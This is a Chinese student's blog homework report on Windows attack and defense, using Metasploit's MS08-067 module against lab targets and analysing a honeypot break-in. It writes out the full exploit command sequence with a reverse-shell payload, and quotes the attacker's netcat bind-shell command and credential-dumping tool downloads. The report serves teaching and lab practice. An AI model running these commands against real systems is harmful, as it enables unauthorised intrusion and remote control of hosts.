20232819 祝浩宣 2023-2024-2 《网络攻防实践》第6次作业

已于 2024-05-30 19:08:04 修改
阅读量761 收藏 10
点赞数 24
文章标签: 网络
于 2024-04-19 22:11:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67687879/article/details/137977984
版权

实践六 Windows操作系统安全攻防

一、实践内容

1、动手实践Metasploit windows attacker
任务:使用metasploit软件进行windows远程渗透统计实验

具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权

2、取证分析实践:解码一次成功的NT系统破解攻击。
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。

攻击者使用了什么破解工具进行攻击?
攻击者如何使用这个破解工具进入并控制了系统?
攻击者获得系统访问权限后做了什么?
我们如何防止这样的攻击?
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?

3、团队对抗实践:windows系统远程渗透攻击和分析。
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。

二、实践过程

1、动手实践Metasploit windows attacker

输入命令行msfconsole进入启动msfconsole
在这里插入图片描述

输入命令行search ms08_067查看漏洞ms08_067详细信息
在这里插入图片描述

看路径可以知道这是一个渗透攻击Windows SMB协议的
输入use windows/smb/ms08_067_netapi 进入漏洞所在的文件
在这里插入图片描述
输入show options查看此漏洞需要的设置
在这里插入图片描述
输入show payloads显示此漏洞的载荷
在这里插入图片描述
选择第三个载荷进行攻击,输入以下命令
set payload generic/shell_reverse_tcp //设置载荷
set RHOST 192.168.200.7 //设置要攻击的主机(Win2kServer)
set LHOSt 192.168.200.4 //设置本机(kali)
在这里插入图片描述
输入exploit进行攻击,出现会话连接即攻击成功
回车即可进入受害者靶机的shell
输入ipconfig查看靶机的IP地址
在这里插入图片描述
2、 取证分析实践:解码一次成功的NT系统破解攻击
打开log文件,筛选有用信息进行分析
ip.addr ==172.16.1.106 and http
在这里插入图片描述
跟踪数据包的tcp数据流
在这里插入图片描述
存在特殊字符%C0%AF。查询百度可知,发现%C0%AF为Unicode编码,由此判断攻击者进行了Unicode攻击以打开boot.ini文件。因此,存在Unicode漏洞攻击
在这里插入图片描述使用http.request.uri contains “msadc” 进行筛选,可以看到攻击机成功上传了工具
在这里插入图片描述
筛选ftp连接,发现直到编号1106连接成功

在这里插入图片描述
追踪TCP流,可以看出:攻击者通过创建了ftpcom脚本,使用ftp连接www.nether.net,并以johna2k为用户haxedj00为密码下载 nc.exe、pdump.exe和samdump.dll
在这里插入图片描述
在下载完文件之后,查看到 1233 号数据包,攻击者执行了这样一条命令:cmd1.exe /c nc -l -p 6969 -e cmd1.exe。表示攻击者连接了6969端口,并且获得了访问权限
在这里插入图片描述
继续查看http数据流,可以看到删除了http的文件,猜测攻击者准备溜走
在这里插入图片描述查看tcp数据流时,发现其是蜜罐攻击。攻击者警觉了他的目标是一台蜜罐主机,攻击者写了这是他见过的最好的蜜罐

在这里插入图片描述
3 、团队对抗实践:windows系统远程渗透攻击和分析
1、防御实践
Kali-Linux攻击机(袁思承) 192.168.126.201
Win2kServer_SP0_target靶机 (祝浩宣) 192.168.126.141
首先,查看自己的靶机的IP地址并ping对方的攻击机如下:
在这里插入图片描述被对方攻击后,首先发现自己的主机中多了对方创建的文件夹yuansichengiscoming!
在这里插入图片描述
使用wireshark抓包能够发现对方的TCP流以及各类操作:
在这里插入图片描述
跟踪TCP流发现,对方入侵我的主机以后使用了以下命令:

在这里插入图片描述
2、攻击实践
Kali-Linux攻击机(祝浩宣)192.168.126.125
Win2kServer_SP0_target靶机 (袁思承) 192.168.126.79
对该IP地址的Win2kServer_SP0_target靶机进行攻击,首先使用以下命令打开Metasploit
在这里插入图片描述
输入以下命令调用MS08-067漏洞以实现相关的攻击,从而利用MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
use exploit/windows/smb/ms08_067_netapi
输入以下命令显示可用的攻击负载
show payloads

在这里插入图片描述
选择以下攻击负载以实现反向连接
set payload generic/shell_reverse_tcp
在这里插入图片描述
设置远程渗透攻击的相关信息,即设置攻击目标IP,设置本机IP,再使用show options查看设置的信息:

set RHOST 192.168.126.79
set LHOST 192.168.126.125
show options
在这里插入图片描述
在这里插入图片描述输入以下命令进行攻击
exploit
在这里插入图片描述
使用以下命令在对方主机中创建文件夹并进入文件夹

mkdir zhuhaoxuan
cd zhuhaoxuan
在这里插入图片描述
查看对方的主机,能够看见已经成功创建该文件夹:
在这里插入图片描述

3.学习中遇到的问题及解决

问题:在Win2k直连后,出现无法上网或IP地址为0.0.0.0的情况。
解决方案:修改Win2k的网络设置,将IP地址设置改为自动获取而非手动指定。

4.学习感悟、思考等

通过这次实验,我学到了如何运用msfconsole工具对靶机进行漏洞攻击,并且分析了一次成功的NT系统破解攻击。最后,我还参与了与同学的攻防实战演练,这大大加深了我对Windows系统远程渗透攻击的理解,并且学习了如何预防和应对漏洞攻击的方法。

20232819-祝浩宣
关注
  • 24
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SXU-网络攻防第六次作业-sql注入进阶
12-27
山西大学网络攻防第六次作业——sql注入进阶 把test靶场中的报错注入,时间注入,堆叠注入,宽子节注入进行练习.这四个注入在127.0.0.1/test/sql/路径下﹒按破解步骤进行,至少做到爆表名这一步﹒每个步骤都要按考试...
SXU-网络攻防第7次作业-文件上传
12-27
山西大学网络攻防第7次作业——文件上传 自己试一下今天上课讲的五种文件上传方式,文件截断绕过攻击可以不做,把步骤截图保存到文档 1. 文件上传 2. JS检测绕过攻击 3. 文件后缀绕过攻击 4. 文件类型绕过攻击 5. 图...
20232819 2023-2024-2 《网络攻防实践》第7次作业
qq_67687879的博客
04-26 508
防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。通过本次使用Metasploit进行Linux远程渗透攻击,首先进一步熟悉了Metasploit工具的使用,其次通过攻防对抗过程,动手进行了从漏洞信息搜集、漏洞利用、渗透攻击到获取目标主机权限的过程,提高了自己的实践能力。
# 20232819 2022-2023-2 《网络攻防实践》实验三
qq_67687879的博客
03-25 922
开启Kali的Wireshark抓包,选择eth0网卡,然后在终端输入zhx以访客登入www.fozztexx.com,访问一段时间后在Wireshark过滤器中输入telnet对telnet协议的数据包进行过滤,抓包结果如图五所示,可知所登录的BBS服务器的IP地址为50.19.157.209,端口为23即telnet服务的端口。这里我使用Kali进行实践。查询TCP,可以发现进行了大量的TCP扫描,例如攻击机向靶机发送SYN请求包,靶机返回SYN,ACK确认连接,攻击机响应,说明该端口开放。
20232819 2023-2024-2 《网络攻防实践》第2次作业
qq_67687879的博客
03-15 792
20232819 2023-2024-2 《网络攻防实践》第2次作业
20232819 2023-2024-2 《网络攻防实践实践10报告
qq_67687879的博客
05-21 959
1、发布恶意消息,显示警报窗口:在您的Elgg配置文件中嵌入一个JavaScript程序,以便当另一个用户查看您的配置文件时,将执行JavaScript程序并显示一个警报窗口。进入Alice的edit profile,找到about me,把代码放到Alice的 About me 下并选择 Edit HTML 模式,输入以下代码,点击保存。通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。4、成为受害者的朋友:使用js程序加受害者为朋友,无需受害者干预,使用相关的工具了解Elgg加好友的过程。
20232819 2023-2024-2 《网络攻防实践实践九报告
qq_67687879的博客
05-12 676
根据上述命令,call指令的机器码为e8,其后紧跟着的是其目标地址的机器码的倒序。编译后,call指令以其所在位置为基址,然后将被调用位置的偏移地址编译成字节码。在给字符串预留的28字节上面的4个字节存放的是main函数的栈底地址,再上面的4个字节则是返回地址。9、因为函数一旦执行到ret就会退出,所以我们在ret处要设置一个断点,输入命令b *0x080484ae来设置断点,然后输入命令c来继续执行程序。3、找到main函数,foo函数,getshell函数,发现在main函数中调用了foo函数。
20232831袁思承2023-2024-2 《网络攻防实践》第6次作业
qq_53198713的博客
04-19 854
网络攻防~
20232831 袁思承 2023-2024-2 《网络攻防实践》第7次作业
qq_53198713的博客
04-25 957
网络攻防~
20231909 2023-2024-2 《网络攻防实践》第2次作业
weixin_57750189的博客
03-14 918
通过这次实验,在锻炼网络攻防的动手能力。同时我也发现了自己的不足和薄弱之处,需将理论与实践结合不断提升自己。4.使用Nessus开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。3.使用nmap开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。因为kali中集成了nmap的开源工具,所以使用kali进行实验。1.对sina.com.cn进行DNS域名查询,获取各种信息。⑤查看靶机各个端口上网络服务存在哪些安全漏洞。你认为如何攻陷靶机环境,以获得系统访问权。《网络攻防技术与实践
20232815 2023-2024-2 《网络攻防实践》第2次作业
u014796654的博客
03-20 1039
通过Wireshark,namp,Nessus等软件对网络信息进行搜集,查询目标的服务,IP地址,具体方位等。
SXU-网络攻防2022-2023学年第一学期期末考试题
12-28
山西大学网络攻防2022-2023学年第一学期期末考试题 山西大学网络攻防2022-2023学年第一学期期末考试题 山西大学网络攻防2022-2023学年第一学期期末考试题 山西大学网络攻防2022-2023学年第一学期期末考试题 山西大学...
SXU-2022-2023第一学期网络攻防期末考试答案(个人版,99.8分).pdf
12-31
山西大学2022-2023第一学期网络攻防期末考试答案 此答案为本人考试时亲自实操完成,99.8分
SXU-网络攻防作业-boolean注入
12-27
山西大学网络攻防作业五——boolean注入 本次作业交文档(参考老师上课发的word的格式,提交结果部分为截图) 练习boolean注入的过程,从文档1646 '中的确定是否有注入开始﹒l用uagents做测试,要求破解第三个字段,...
Wireshark TS | 应用传输丢包问题
7ACE的博客
06-09 793
Wireshark TS | 应用传输丢包问题
网络安全技术实验一 信息收集和漏洞扫描
zzzfff__的博客
06-09 986
了解信息搜集和漏洞扫描的一般步骤,利用Nmap等工具进行信息搜集并进行综合分析;掌握TCP全连接扫描、TCP SYN扫描的原理,利用Scapy编写网络应用程序,开发端口扫描功能模块;使用漏洞扫描工具发现漏洞并进行渗透测试。
工业网关在智能制造中的具体应用和效果-天拓四方
最新发布
2401_84969963的博客
06-14 526
通过对数据的处理和分析,我们可以获得设备的运行状态、生产效率、故障预警等信息,为企业提供决策支持和优化建议。未来,随着技术的不断进步和应用场景的拓展,工业网关将在智能制造领域发挥更加重要的作用,为企业创造更多的价值。网关设备通过有线或无线方式与生产设备进行连接,实时收集设备的运行状态、生产数据等信息,并将数据通过安全可靠的通信协议传输至企业的数据中心或云平台。通过工业网关的应用,企业实现了对生产设备的实时监控和数据分析,能够及时发现并解决设备故障和生产瓶颈,提高生产效率。
cs61C | lecture4
DaphneOdera17的博客
06-10 671
## Stack在最顶部,向下增长。包含局部变量和 function frame information。栈指针(SP, Stack Pointer) 告诉我们最低(当前)stack frame 在哪里。当进程结束时,SP 会移动回之前的位置,但是数据会保留(现在变成 garbage)。```ca(0);return 1;b(1);c(2);d(4);```!!以下错误代码:```cint y;y = 3;return &y;/* 3 *//*?*/
CVE-2023-3519
07-27
source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值